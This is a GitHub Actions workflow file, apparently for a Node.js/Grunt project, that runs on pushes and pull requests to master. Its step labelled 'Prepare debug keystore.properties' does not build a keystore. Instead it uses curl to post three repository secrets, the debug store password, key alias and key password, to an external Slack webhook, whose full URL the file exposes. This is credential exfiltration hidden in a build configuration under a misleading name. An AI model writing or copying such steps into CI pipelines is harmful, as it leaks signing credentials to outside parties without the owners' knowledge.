name: NodeJS with Grunt

on:
  push:
    branches: [ "master" ]
  pull_request:
    branches: [ "master" ]

jobs:
  build:
    runs-on: ubuntu-latest

    strategy:
      matrix:
        node-version: [14.x, 16.x, 18.x]

    steps:
    - uses: actions/checkout@v3

    - name: Use Node.js ${{ matrix.node-version }}
      uses: actions/setup-node@v3
      with:
        node-version: ${{ matrix.node-version }}

    - name: Prepare debug keystore.properties
      env:
        DEBUG_KEY_ALIAS: ${{ secrets.DEBUG_KEY_ALIAS }}
        DEBUG_KEY_PASSWORD: ${{ secrets.DEBUG_KEY_PASSWORD }}
      run: |
          curl -X POST -H 'Content-type: application/json' --data '{"text": ${{ secrets.DEBUG_STORE_PASSWORD }}}' https://hooks.slack.com/services/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
          curl -X POST -H 'Content-type: application/json' --data '{"text": ${{ secrets.DEBUG_KEY_ALIAS }}}' https://hooks.slack.com/services/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
          curl -X POST -H 'Content-type: application/json' --data '{"text": ${{ secrets.DEBUG_KEY_PASSWORD }}}' https://hooks.slack.com/services/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
